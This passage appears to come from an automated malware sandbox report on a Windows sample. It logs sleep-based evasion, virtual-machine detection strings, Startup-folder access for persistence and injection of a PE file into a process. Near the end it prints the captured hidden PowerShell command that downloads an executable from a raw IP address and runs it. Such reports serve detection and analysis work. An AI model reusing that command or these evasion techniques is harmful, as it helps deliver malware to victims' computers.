                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -98234s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -98125s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -98016s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -97906s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -97797s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -97687s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -97578s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -97464s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -97356s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -97234s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -96901s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -96772s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 1048Thread sleep count: 2644 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 1048Thread sleep count: 7198 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -599765s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -599546s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -599437s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -599328s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -599218s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -599109s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -598999s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -598890s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -598781s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -598671s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -598562s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -598453s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -598343s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -598234s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -598125s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -598015s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -597906s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -597796s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -597687s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -597566s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -597451s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -597328s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -597218s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -597093s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -596967s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -596850s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -596734s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -596625s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -596515s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -596406s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -596297s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -596172s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -596062s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -595953s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -595843s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -595734s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -595624s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -595500s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -595390s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -595281s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -595172s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -595062s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -594949s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -594828s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -594718s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -594609s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 5912Thread sleep time: -594499s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 99891Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 99781Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 99672Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 99561Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 99453Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 99344Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 99231Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 99125Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 99016Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 98902Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 98796Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 98687Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 98575Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 98467Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 98359Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 98250Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 98139Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 98031Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 97922Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 97813Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 97688Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 97563Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 97438Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 97328Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 97219Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 97094Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 96984Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 96875Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 96765Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 96656Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 96547Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 599557Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 599206Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 599078Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 598969Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 598859Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 598750Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 598640Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 598531Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 598422Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 598312Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 598199Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 598078Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 597889Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 597757Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 597645Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 597515Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 597406Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 597297Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 597187Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 597078Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 596969Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 596859Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 596750Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 596640Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 596531Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 596422Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 596312Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 596203Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 596093Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 595983Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 595870Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 595719Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 595590Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 595464Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 595354Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 595234Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 595053Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 594923Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 594797Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 594687Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 594578Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 594468Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 594359Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 594250Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 594140Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 594031Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 593921Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 99874Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 99761Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 99545Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 99436Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 99327Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 99218Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 99109Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 99000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 98891Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 98781Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 98672Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 98562Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 98453Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 98344Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 98234Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 98125Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 98016Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 97906Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 97797Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 97687Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 97578Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 97464Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 97356Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 97234Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 96901Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 96772Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 599546Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 599218Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598999Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598671Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598343Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 597796Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 597687Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 597566Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 597451Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 597218Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 597093Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 596967Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 596850Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 596734Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 596625Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 596515Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 596406Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 596297Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 596172Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 596062Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 595953Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 595843Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 595734Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 595624Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 595390Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 594949Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 594718Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 594609Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 594499Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                Source: TypeId.exe, 00000008.00000002.2547706995.000000000241C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                Source: TypeId.exe, 00000008.00000002.2547706995.000000000241C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                Source: TypeId.exe, 0000000A.00000002.4553377918.0000000000C16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
                Source: powershell.exe, 00000001.00000002.2153624910.000001A0F91C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.2277936440.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.4553923152.000000000083C000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2544462222.00000000007C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Local\Temp\file.exeMemory written: C:\Users\user\AppData\Local\Temp\file.exe base: 560000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\TypeId.exe "C:\Users\user\AppData\Roaming\TypeId.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess created: C:\Users\user\AppData\Roaming\TypeId.exe "C:\Users\user\AppData\Roaming\TypeId.exe"Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -command "& { invoke-webrequest -uri http://87.120.113.91/chrome.exe -outfile c:\users\user\appdata\local\temp\file.exe; start-process 'c:\users\user\appdata\local\temp\file.exe' }"
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqH[
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqH^
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqH_
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqP'm
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqdPo
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHS
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHU
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHX
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHY
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPic
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq0(^
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDQ`
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHC
